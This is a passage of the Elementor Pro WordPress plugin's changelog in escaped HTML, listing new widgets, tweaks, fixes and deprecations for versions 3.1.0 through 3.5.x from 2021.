style controls are not working as expected in WooCommerce Add to Cart widget<\\/li>\\n<li>Fix: Display conditions module is not working as expected when using the new Theme Builder UI<\\/li>\\n<li>Fix: Edit header handles <code>z-index<\\/code> issues in Header document<\\/li>\\n<li>Fix: Panel icons UI glitch in Call To Action widget<\\/li>\\n<li>Fix: WordPress 5.9 <code>WP_User_query<\\/code> <code>who<\\/code> argument deprecation adjustments<\\/li>\\n<\\/ul>\\n<h4>3.5.2 - 2021-11-28<\\/h4>\\n<ul>\\n<li>Tweak: Adjusted license mechanism to support trial period<\\/li>\\n<li>Fix: Updates made to Global Widgets do not reflect accordingly to linked widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16815\\\">#16815<\\/a>)<\\/li>\\n<li>Fix: Hamburger toggle button doesn't change to \\u201cclose\\u201d when menu is collapsed in Nav Menu widget when Inline Font Awesome experiment is active<\\/li>\\n<li>Fix: Global Widget cannot be unlinked<\\/li>\\n<\\/ul>\\n<h4>3.5.1 - 2021-11-10<\\/h4>\\n<ul>\\n<li>Fix: Inline HTML elements appear as plain text in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16816\\\">#16816<\\/a>)<\\/li>\\n<li>Fix: Dropdown items inherited values from Main Menu space between control in Nav Menu widget (<a href=\\\"(https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16815)\\\">#16815<\\/a><\\/li>\\n<li>Fix: Order Summary titles style controls not applying on various devices in Cart widget<\\/li>\\n<li>Fix: Panel "Need Help" link is not correct in WooCommerce section in Site Settings<\\/li>\\n<\\/ul>\\n<h4>3.5.0 - 2021-11-01<\\/h4>\\n<ul>\\n<li>New: WooCommerce Checkout widget - Fully customize the content and style of your checkout page (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15282\\\">#15282<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15990\\\">#15990<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11014\\\">#11014<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13218\\\">#13218<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5383\\\">#5383<\\/a>)<\\/li>\\n<li>New: WooCommerce Cart widget - Style your cart page the way you want with design flexibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15282\\\">#15282<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11014\\\">#11014<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13218\\\">#13218<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5383\\\">#5383<\\/a>)<\\/li>\\n<li>New: WooCommerce My Account widget - Create a custom design for your my account pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11014\\\">#11014<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5383\\\">#5383<\\/a>)<\\/li>\\n<li>New: Progress Tracker widget - Motivate your customers to keep reading your site content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16576\\\">#16576<\\/a>)<\\/li>\\n<li>New: Meet WooCommerce Site Settings - Set your store pages within Elementor<\\/li>\\n<li>Experiment: Scroll Snap - Set the scene of every scroll (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10752\\\">#10752<\\/a>)<\\/li>\\n<li>Tweak: Changed infrastructure to prevent rendering bugs in Global Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16354\\\">#16354<\\/a>)<\\/li>\\n<li>Tweak: Added the option to open submission in a new tab in Form Submissions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14967\\\">#14967<\\/a>)<\\/li>\\n<li>Tweak: Added various responsive controls in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1851\\\">#1851<\\/a>)<\\/li>\\n<li>Tweak: Split Title and Price styling controls in Price List widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7688\\\">#7688<\\/a>)<\\/li>\\n<li>Tweak: Added various responsive capabilities to controls in Posts Archive widget<\\/li>\\n<li>Tweak: Adjusted Motion Effects module to support future feature<\\/li>\\n<li>Tweak: Changed admin notice content when Pro installed without Core installed<\\/li>\\n<li>Tweak: Cleanup in <code>wp_options<\\/code> table<\\/li>\\n<li>Tweak: Changed Connect logic in Elementor top bar to simplify the connect process<\\/li>\\n<li>Tweak: Marked new Theme Builder as an Experiment and set to default for new sites<\\/li>\\n<li>Tweak: Enforced better security policies in various widgets and modules<\\/li>\\n<li>Tweak: Added load more button functionality to the Posts Archive widget<\\/li>\\n<li>Tweak: Renamed Elementor's responsive SCSS variables<\\/li>\\n<li>Tweak: Added dividers to horizontal layout in Nav Menu widget<\\/li>\\n<li>Tweak: Removed Google+ social network from Share Buttons widget<\\/li>\\n<li>Tweak: Convert usage of old Responsive class to use the new Breakpoints Manager<\\/li>\\n<li>Fix: jQuery in Heading doesn't work for not logged in users in Custom Code (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14515\\\">#14515<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14266\\\">#14266<\\/a>)<\\/li>\\n<li>Fix: Menu animation causing page horizontal scroll in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15184\\\">#15184<\\/a>)<\\/li>\\n<li>Fix: Wrong function call in Table of Content & Post Excerpt widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16547\\\">#16547<\\/a>)<\\/li>\\n<li>Fix: Slides to Scroll control can't be set to Default if Widescreen mode has a value in Testimonial Carousel widget<\\/li>\\n<li>Fix: Sticky offset not working properly when changing device mode<\\/li>\\n<li>Fix: UTF character issues when exporting CSV file in Form Submissions<\\/li>\\n<li>Fix: Load More functionality doesn't work when the Posts widget placed inside an Archive template<\\/li>\\n<li>Fix: UI glitches and editing issues in Video Playlist widget<\\/li>\\n<\\/ul>\\n<h4>3.4.2 - 2021-10-12<\\/h4>\\n<ul>\\n<li>Fix: Icons color style conflicts when Font-Awesome Inline experiment is active in Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16435\\\">#16435<\\/a>)<\\/li>\\n<li>Fix: Mini Cart hides page content when closed in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16305\\\">#16305<\\/a>)<\\/li>\\n<li>Fix: UI glitches in the Editor edit mode when inserting Post Content widget and Font-Awesome Inline experiment is active in Single Post template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16358\\\">#16358<\\/a>)<\\/li>\\n<li>Fix: Slides per view controls disappeared from multiple breakpoints in Testimonial Carousel<\\/li>\\n<li>Fix: Product variations UI glitch in Menu Cart widget<\\/li>\\n<li>Fix: Buttons UI glitch on Safari browser in Menu Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.4.1 - 2021-09-01<\\/h4>\\n<ul>\\n<li>Fix: Sticky functionality is not working if the Additional Custom Breakpoints experiment is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16186\\\">#16186<\\/a>)<\\/li>\\n<li>Fix: Slideshow skin UI glitch in Media Carousel widget<\\/li>\\n<li>Fix: Product price typography weight control is not working as expected in Menu Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.4.0 - 2021-09-01<\\/h4>\\n<ul>\\n<li>Tweak: Added new Mini Cart layout type in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11312\\\">#11312<\\/a>)<\\/li>\\n<li>Tweak: Added styling options for Cart, Products, and Cart buttons in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14952\\\">#14952<\\/a>)<\\/li>\\n<li>Tweak: Added the ability to open cart automatically when an item is added in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14119\\\">#14119<\\/a>)<\\/li>\\n<li>Tweak: Added the ability to remove an item from cart without reloading the page with an AJAX request (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9531\\\">#9531<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10875\\\">#10875<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11309\\\">#11309<\\/a>)<\\/li>\\n<li>Tweak: Added Load More AJAX functionality to Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12126\\\">#12126<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1284\\\">#1284<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14557\\\">#14557<\\/a>)<\\/li>\\n<li>Tweak: Added Vimeo support to the Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15319\\\">#15319<\\/a>)<\\/li>\\n<li>Tweak: Improved asset loading performance by serving lighter JS files (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8572\\\">#8572<\\/a>)<\\/li>\\n<li>Tweak: Added query string to the URL only after the first video is played in Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15348\\\">#15348<\\/a>)<\\/li>\\n<li>Tweak: Added various layout options with more responsive controls and cart structure options in Menu Cart widget<\\/li>\\n<li>Tweak: Added the option to open the menu cart by click or hover in Menu Cart widget<\\/li>\\n<li>Tweak: Added the ability to choose a specific product to draw data from in WooCommerce Dynamic tags<\\/li>\\n<li>Tweak: Removed auto-scroll to the widget location when arriving from external URL in Video Playlist widget<\\/li>\\n<li>Tweak: Removed the Video Playlist widget from the Experiments list<\\/li>\\n<li>Tweak: Added descriptive error messages for MailChimp action after submit and on form submit in Forms widget<\\/li>\\n<li>Tweak: Added tooltip trigger None and Hover for link in Hotspot widget<\\/li>\\n<li>Tweak: Added responsive controls to Offset and Effects Offset in Sticky options<\\/li>\\n<li>Tweak: Added responsive control to Alignment in Testimonial Carousel widget<\\/li>\\n<li>Tweak: Adjusted Motion Effects module to support future feature<\\/li>\\n<li>Tweak: Added future compatibility to support better loading of <code>eicons<\\/code> font<\\/li>\\n<li>Tweak: Changed Rename Part title and button color in Theme Builder<\\/li>\\n<li>Fix: Products don't appear on the cart while editing in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15451\\\">#15451<\\/a>)<\\/li>\\n<li>Fix: Videos always start muted in the Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15292\\\">#15292<\\/a>)<\\/li>\\n<li>Fix: Unnecessary spacing if submenu indicator is set to None in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15365\\\">#15365<\\/a>)<\\/li>\\n<li>Fix: MailChimp double opt-in feature doesn't work in Forms widget<\\/li>\\n<li>Fix: Fetching MailChimp groups field blocks the loading of the rest of the fields in the Form widget<\\/li>\\n<li>Fix: Missing field IDs causes forms not to be sent in Forms widget<\\/li>\\n<li>Fix: Full Content Skin is not working properly when inserted twice on the same page in Posts widget<\\/li>\\n<li>Fix: Avoid Duplicates option doesn't exclude manual selections in Posts widget<\\/li>\\n<li>Fix: Submenu indicator alignment issue in Nav menu widget<\\/li>\\n<li>Fix: Query control deprecated message appears when debug mode is defined<\\/li>\\n<li>Fix: Tweet Button icon incorrect color and size when the icon is rendered as SVG in Blockquote widget<\\/li>\\n<li>Fix: Video icon size is not changing on Active state in Video Playlist widget<\\/li>\\n<li>Fix: Header icon color is not working in Table Of Content widget<\\/li>\\n<li>Fix: Icons style glitches when Font Awesome Inline experiment is active in Video Playlist widget<\\/li>\\n<li>Fix: Bullet markers are not visible on preview mode when Font Awesome Inline experiment is active in Table of Content widget<\\/li>\\n<li>Fix: UI Glitch when Font-Awesome Inline experiment is active in Price Table widget<\\/li>\\n<li>Fix: Submenu Indicator appears larger when Font Awesome Inline experiment is active in Nav Menu widget<\\/li>\\n<li>Fix: Part name is deleted when clicking on the "Change" Button without changing the name in Theme Builder<\\/li>\\n<li>Fix: Redundant pagination queries in the Editor<\\/li>\\n<li>Deprecated: Remove all usages of <code>Elementor\\\\Utils::get_create_new_post_url()<\\/code><\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-4-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.3.8 - 2021-08-23<\\/h4>\\n<ul>\\n<li>Fix: Products grid width issue when adjusting columns and rows in Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16001\\\">#16001<\\/a>)<\\/li>\\n<li>Fix: Font Awesome Inline experiment causes icons glitch in Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16045\\\">#16045<\\/a>)<\\/li>\\n<li>Fix: reCAPTCHA v3 <code>z-index<\\/code> is lower than the Section's background color<\\/li>\\n<li>Fix: Style missing when Font Awesome inline experiment is active in Post Info widget<\\/li>\\n<li>Fix: Font Awesome icons were not loaded in Post Info widget<\\/li>\\n<li>Fix: Zero character can't be used as a placeholder in Number field in Form widget<\\/li>\\n<li>Fix: Carousels are not working properly in the Editor when Additional Custom Breakpoints experiment is active<\\/li>\\n<\\/ul>\\n<h4>3.3.7 - 2021-08-15<\\/h4>\\n<ul>\\n<li>Tweak: Added support for Additional Custom Breakpoints in Nav Menu widget<\\/li>\\n<li>Tweak: Added support for Additional Custom breakpoints in Motion Effects<\\/li>\\n<li>Fix: Columns didn't respond to changes in Gallery widget if Additional Custom Breakpoints Experiment is active<\\/li>\\n<\\/ul>\\n<h4>3.3.6 - 2021-08-10<\\/h4>\\n<ul>\\n<li>Tweak: Added support for future feature in Nav Menu widget<\\/li>\\n<li>Fix: WooCommerce responsive grid styles are not being reflected in Product Related widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15857\\\">#15857<\\/a>)<\\/li>\\n<li>Fix: WooCommerce responsive grid styles are not being reflected in Upsells widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15857\\\">#15857<\\/a>)<\\/li>\\n<li>Fix: WooCommerce responsive grid styles are not being reflected in Product Categories widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15857\\\">#15857<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.3.5 - 2021-08-01<\\/h4>\\n<ul>\\n<li>Fix: Responsive layout glitches in Products and Products Archive widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15773\\\">#15773<\\/a>)<\\/li>\\n<li>Fix: reCAPTCHA V3 integration conflict with required fields validation in Forms widget<\\/li>\\n<\\/ul>\\n<h4>3.3.4 - 2021-07-21<\\/h4>\\n<ul>\\n<li>Fix: Grid layout glitch in WooCommerce Products Archive widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15718\\\">#15718<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.3.3 - 2021-07-20<\\/h4>\\n<ul>\\n<li>Tweak: Added a descriptive message in Collect Submissions action after submit<\\/li>\\n<li>Tweak: Added future compatibility for Additional Custom Breakpoints for Pro widgets<\\/li>\\n<li>Fix: Some widget style breaks when Improved CSS Loading Experiment is active in certain cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15632\\\">#15632<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15683\\\">#15683<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15660\\\">#15660<\\/a>)<\\/li>\\n<li>Fix: Translation update keep appearing as available after install (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14297\\\">#14297<\\/a>)<\\/li>\\n<li>Fix: Wrong default icon color when using Font Awesome icons as inline SVG in Call to Action widget<\\/li>\\n<\\/ul>\\n<h4>3.3.2 - 2021-07-13<\\/h4>\\n<ul>\\n<li>Tweak: Updated plugin description<\\/li>\\n<li>Fix: MailChimp tags in form widget replaced existing tags (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11111\\\">#11111<\\/a>)<\\/li>\\n<li>Fix: Clicking videos from the items list in edit mode doesn\\u2019t initiate videos properly<\\/li>\\n<li>Fix: User unauthorized message when activated but not connected in Kit Library<\\/li>\\n<li>Fix: Carousel widgets did not support additional custom breakpoint responsive values<\\/li>\\n<li>Fix: Tab border is overridden by the Section background color in Video Playlist widget<\\/li>\\n<li>Fix: Widgets style breaks when Improved CSS Load experiment is active in a Single Page template and Post Content widget<\\/li>\\n<\\/ul>\\n<h4>3.3.1 - 2021-06-20<\\/h4>\\n<ul>\\n<li>Tweak: Added support for more Theme Builder display conditions in Export \\/ Import experiment<\\/li>\\n<li>Tweak: Adjusted License page heading structure for future feature<\\/li>\\n<li>Tweak: Adjusted Font Awesome icon for allowing support for future feature<\\/li>\\n<li>Fix: <code>frontend.min.js<\\/code> file size increased in Elementor Pro 3.3.0 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15278\\\">#15278<\\/a>)<\\/li>\\n<li>Fix: Prevent conditions from being reset when object cache is enabled in site (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13299\\\">#13299<\\/a>)<\\/li>\\n<li>Fix: Custom Code publish modal responsiveness issues (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14519\\\">#14519<\\/a>)<\\/li>\\n<li>Fix: Populating fields with options programmatically doesn't appear in Submissions screen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10671\\\">#10671<\\/a>)<\\/li>\\n<li>Fix: Large images are not shown on the Image Carousel widget when set via Toolset dynamic tag<\\/li>\\n<li>Fix: Enable inline editing to the inner content tabs in Video Playlist widget<\\/li>\\n<li>Fix: Clicking on the video list doesn't play videos properly in Video Playlist widget<\\/li>\\n<li>Fix: Hide Play Icon control when Image overlay is toggled off in Video Playlist widget<\\/li>\\n<li>Fix: Removed extra space below the player when viewing from mobile view in Video Playlist widget<\\/li>\\n<li>Fix: Import button is not working properly in Theme Builder interface<\\/li>\\n<li>Fix: Preview Dynamic Content as control is not updating preview and throws an error in Popup Builder<\\/li>\\n<\\/ul>\\n<h4>3.3.0 - 2021-06-08<\\/h4>\\n<ul>\\n<li>New: Video Playlist widget - Add Engaging Video Content to Your Website (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11859\\\">#11859<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7803\\\">#7803<\\/a>)<\\/li>\\n<li>New: Hotspot widget - Create Interactive Images With Contextually Relevant Information (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7282\\\">#7282<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2768\\\">#2768<\\/a>)<\\/li>\\n<li>Tweak: Accessibility improvements for sub-menus in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13859\\\">#13859<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13810\\\">#13810<\\/a>)<\\/li>\\n<li>Tweak: MailChimp action after submit can now add new tags to existing subscribers in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11111\\\">#11111<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/forms\\/record\\/actions_before<\\/code> to filter the record before it sent to Actions After Submit in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14261\\\">#14261<\\/a>)<\\/li>\\n<li>Tweak: Yoast SEO breadcrumbs widget can be used in Elementor without the need of enabling them in Yoast setting<\\/li>\\n<li>Tweak: Added future support for widgets CSS conditional loading (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10329\\\">#10329<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14229\\\">#14229<\\/a>)<\\/li>\\n<li>Tweak: Added future support for Sticky JS library conditional loading<\\/li>\\n<li>Tweak: Added future support for Import \\/ Export experiment<\\/li>\\n<li>Tweak: Preparations and fixes for Import Export Experiment in Pro version<\\/li>\\n<li>Tweak: Added gradient button capabilities to Login widget buttons<\\/li>\\n<li>Tweak: Added gradient button capabilities to Slides widget button<\\/li>\\n<li>Tweak: Added gradient button capabilities to Price Table widget button<\\/li>\\n<li>Tweak: Added gradient button capabilities to Flip Box widget button<\\/li>\\n<li>Tweak: Added Code Highlight widget Developers Documentation<\\/li>\\n<li>Tweak: Adjusted Submissions page for future updates<\\/li>\\n<li>Tweak: Added <code>em<\\/code> and <code>%<\\/code> units for padding control in Carousel widgets<\\/li>\\n<li>Tweak: Shorten currency name to currency symbol in PayPal button widget<\\/li>\\n<li>Fix: Custom Fonts URLs should be replaced when replace URL is triggered (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7376\\\">#7376<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10382\\\">#10382<\\/a>)<\\/li>\\n<li>Fix: The currency symbol size changed in the Price Table widget if enabling sale (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13519\\\">#13519<\\/a>)<\\/li>\\n<li>Fix: Nav Menu widget is not loading Font Awesome submenu icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9907\\\">#9907<\\/a>)<\\/li>\\n<li>Fix: Hamburger toggle is not working in Nav menu widget<\\/li>\\n<li>Fix: Activation bug for IDN domains<\\/li>\\n<li>Fix: Conditions modal responsive glitches in Custom Code<\\/li>\\n<li>Fix: Duplicated strings in Custom Code module<\\/li>\\n<li>Fix: Enable resize option for code input field in Custom Code<\\/li>\\n<li>Fix: \\u201cSave & Close \\u201cbutton in Custom Code's Conditions modal was not visible on small screen sizes<\\/li>\\n<li>Fix: Removing a column from a section in the navigator resulted in an empty section<\\/li>\\n<li>Fix: Recommend option is cut If the layout is not "Standard" in the Facebook Button widget<\\/li>\\n<li>Fix: Video item does not play without adding an image in Media Carousel widget<\\/li>\\n<li>Fix: <code>search-plus<\\/code> icon missing from panel in Media Carousel widget<\\/li>\\n<li>Fix: UI hover state glitch in Media Carousel widget<\\/li>\\n<li>Fix: PHP notice was thrown when trying to import a kit without overrideConditions parameter in Kit Import flow<\\/li>\\n<li>Fix: Templates conditions not imported if there are no conflicts in Import Export Experiment<\\/li>\\n<li>Fix: Non english values are not encoded properly on Submissions export<\\/li>\\n<li>Fix: Theme Builder import is not working properly<\\/li>\\n<li>Fix: UI glitch when no global widgets were found in Editor Panel<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-3-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.2.2 - 2021-05-05<\\/h4>\\n<ul>\\n<li>Tweak: Added support for Expert tier templates in Templates Library<\\/li>\\n<li>Tweak: Updated compatibility tag to support Elementor v3.2.x<\\/li>\\n<li>Tweak: Added compatibility for future Library improvements<\\/li>\\n<li>Fix: Toolset image dynamic field is not working with Gallery widget<\\/li>\\n<\\/ul>\\n<h4>3.2.1 - 2021-03-21<\\/h4>\\n<ul>\\n<li>Tweak: Added strings context in PayPal button and Price Table widgets<\\/li>\\n<li>Tweak: Added support for future Import \\/ Export Kit feature<\\/li>\\n<li>Fix: Submissions with over than 191 characters weren't indexed properly<\\/li>\\n<\\/ul>\\n<h4>3.2.0 - 2021-03-14<\\/h4>\\n<ul>\\n<li>New: PayPal Button widget - Collect PayPal payments directly from your site<\\/li>\\n<li>Experiment: Submissions - Save all of your form submissions in one place (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1686\\\">#1686<\\/a>)<\\/li>\\n<li>Tweak: Added Stay In Column option to Inner Section element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7956\\\">#7956<\\/a>)<\\/li>\\n<li>Tweak: Adjusted 'Max Height' control range in Table of Contents widget<\\/li>\\n<li>Tweak: Changed descriptive text in Create Custom Code screen<\\/li>\\n<li>Tweak: Added support for dynamic capabilities in Code Highlight widget<\\/li>\\n<li>Tweak: Added support for future load on demand for <code>share-link<\\/code> library<\\/li>\\n<li>Tweak: Added support for future load on demand for <code>dialog<\\/code> library in Popup<\\/li>\\n<li>Tweak: Allow overwriting the assets URL when using a mirror domain<\\/li>\\n<li>Fix: Animation was triggered multiple times when accessing the viewport in certain cases in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13951\\\">#13951<\\/a>)<\\/li>\\n<li>Fix: Location is not being updated after a Custom Code snippet is published (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13971\\\">#13971<\\/a>)<\\/li>\\n<li>Fix: Custom Fonts CSS files were not updated after regenerating CSS files<\\/li>\\n<li>Fix: Conditions modal is not responsive in Custom Code<\\/li>\\n<li>Fix: Empty order buttons are displayed in Custom Fonts screen<\\/li>\\n<li>Fix: Typo in 'Reply To' Email action after submit placeholder in Forms widget<\\/li>\\n<li>Fix: Unnecessary Save Draft button in Custom Code<\\/li>\\n<li>Fix: RTL glitches in Custom Code<\\/li>\\n<li>Fix: Sanitized options in the editor to enforce better security policies<\\/li>\\n<li>Deprecated: See all deprecations to this version in our (<a href=\\\"https:\\/\\/developers.elementor.com\\/v3-2-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.1.1 - 2021-02-23<\\/h4>\\n<ul>\\n<li>Tweak: Adjusted 'Max Height' control range in Table of Contents widget<\\/li>\\n<li>Fix: Popup event handler is undefined (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11475%5D\\\">#11475<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10690\\\">#10690<\\/a>)<\\/li>\\n<li>Fix: Conditions modal is not responsive in Custom Code<\\/li>\\n<li>Fix: RTL glitches in Code Highlight widget<\\/li>\\n<li>Fix: Minor UI glitches in Code Highlight widget<\\/li>\\n<li>Fix: Users can't get Pro Developer Edition version updates<\\/li>\\n<\\/ul>\\n<h4>3.1.0 - 2021-02-13<\\/h4>\\n<ul>\\n<li>New: Introducing Custom Code - Add custom code snippets to your site, including <code>head<\\/code>, <code>body<\\/code> start and <code>body<\\/code> end<\\/li>\\n<li>New: Meet Code Highlight widget - showcase any syntax with highlighted UI (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5815\\\">#5815<\\/a>)<\\/li>\\n<li>Experiment: Improved Pro widgets performance by loading JS and Swiper assets conditionally in frontend (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8572\\\">#8572<\\/a>, <a href=\\\"https:\\/\\/developers.elementor.com\\/experiment-optimized-asset-loading\\/\\\">Developer Documentation<\\/a>)<\\/li>\\n<li>Tweak: Added Compatibility Tag support in Elementor Pro (<a href=\\\"https:\\/\\/developers.elementor.com\\/compatibility-tag\\/\\\">Developer Documentation<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities to Rotating Text animation in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4625\\\">#4625<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8569\\\">#8569<\\/a>)<\\/li>\\n<li>Tweak: Added an option to set Selected color for Typing effect in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5403\\\">#5403<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7826\\\">#7826<\\/a>)<\\/li>\\n<li>Tweak: Added animation Loop option for Animated Headline (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9749\\\">#9749<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2457\\\">#2457<\\/a>)<\\/li>\\n<li>Tweak: Added timing options for Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4392\\\">#4392<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities for Testimonial Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8569\\\">#8569<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities for Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4242\\\">#4242<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8569\\\">#8569<\\/a>)<\\/li>\\n<li>Tweak: Added Word Wrap control to Code Highlight widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13577\\\">#13577<\\/a>)<\\/li>\\n<li>Tweak: Upgraded Font Awesome Pro library to v5.15.1<\\/li>\\n<li>Tweak: Improved method of loading field mapping 